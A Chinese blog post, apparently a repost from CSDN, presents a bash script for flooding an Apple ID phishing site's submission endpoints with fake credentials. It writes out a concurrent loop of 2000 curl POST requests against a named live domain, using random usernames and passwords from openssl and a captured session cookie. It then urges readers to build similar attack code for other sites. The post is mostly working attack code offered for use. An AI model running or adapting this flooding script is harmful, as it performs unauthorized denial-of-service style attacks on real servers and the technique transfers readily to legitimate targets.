标签:
现在的小偷、骗子太多了,被偷的东西需要解除原有的Apple ID才可以绑定新的apple id,于是各种欺骗邮件纷纷到来进行诈骗,今天告诉大家怎么讲该死的诈骗服务器搞死。
1.原理:向诈骗邮件提交各种用户名、密码、验证信息,这些信息看着像那么回事;shell信息,采用多线程,不断将垃圾信息塞到骗子的数据库中,使其应接不暇,最后绝命而死。
2 代码
#!/bin/bash mkfifo fd2 exec 9<>fd2 echo -n -e "1\n1\n1\n" 1>&9 for((i=0;i<2000;i++)) do read -u 9 { curl 'http://www.rebn.xyz/fish/password/submit_q' -H 'Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b0a96ff73d18584648001410103231e8%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22159.226.43.96%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_10_1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F40.0.2214.91+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1422254382%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A2%3A%22id%22%3Bi%3A137%3B%7D8a096a4981e184082bc2b5adbdc13f15' -H 'RA-Sid: 9FE22B60-20141024-071647-6043cd-3135f4' -H 'Origin: http://www.rebn.xyz' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://www.rebn.xyz/fish/password/question' -H 'Connection: keep-alive' -H 'RA-Ver: 2.8.7' -H 'DNT: 1' --data 'q1=%E4%BD%A0%E5%AD%A6%E4%BC%9A%E5%81%9A%E7%9A%84%E7%AC%AC%E4%B8%80%E9%81%93%E8%8F%9C%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F&s1=ewtretertret&q2=%E4%BD%A0%E4%B8%8A%E5%B0%8F%E5%AD%A6%E6%97%B6%E6%9C%80%E5%96%9C%E6%AC%A2%E7%9A%84%E8%80%81%E5%B8%88%E5%A7%93%E4%BB%80%E4%B9%88%EF%BC%9F&s2=ertert&q3=%E4%BD%A0%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AA%E4%B8%8A%E5%8F%B8%E5%8F%AB%E4%BB%80%E4%B9%88%E5%90%8D%E5%AD%97%EF%BC%9F&s3=ertertertert&date=20120508&appleId=' --compressed #curl 'http://www.rebn.xyz/fish/home/add_info' --data "username=sdfsdf@13123.com&userpass=erwe.com" name='' host='' pasword='' name=`openssl rand -base64 8 |cut -b 1-7` host=`openssl rand -base64 8 |cut -b 1-6` pasword=`openssl rand -base64 18 |cut -b 1-15` curl 'http://www.rebn.xyz/fish/home/add_info' -H 'Accept: text/plain, */*; q=0.01' -H 'Referer: http://www.rebn.xyz/fish/index/?UHFTR=7115' -H 'Origin: http://www.rebn.xyz' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' --data 'username='${name}'%40'${host}'.com&userpass='${pasword} --compressed sleep 1 echo "$REPLY" echo -ne "1\n" 1>&9 } & done wait rm -f fd2
3.保存为battle.sh,执行
sh battle.sh4.主要工作原理:使用openssl产生一些随机数,包括用户名、email主机信息以及密码,然后通过curl命令构建表单数据攻击,其他部分就是并发操作了。其它的钓鱼网站,各位可以通过查看源代码的方式,获取其提交的地址,构建相对应的攻击代码。
标签:
原文地址:http://blog.csdn.net/qibaoyuan/article/details/43153307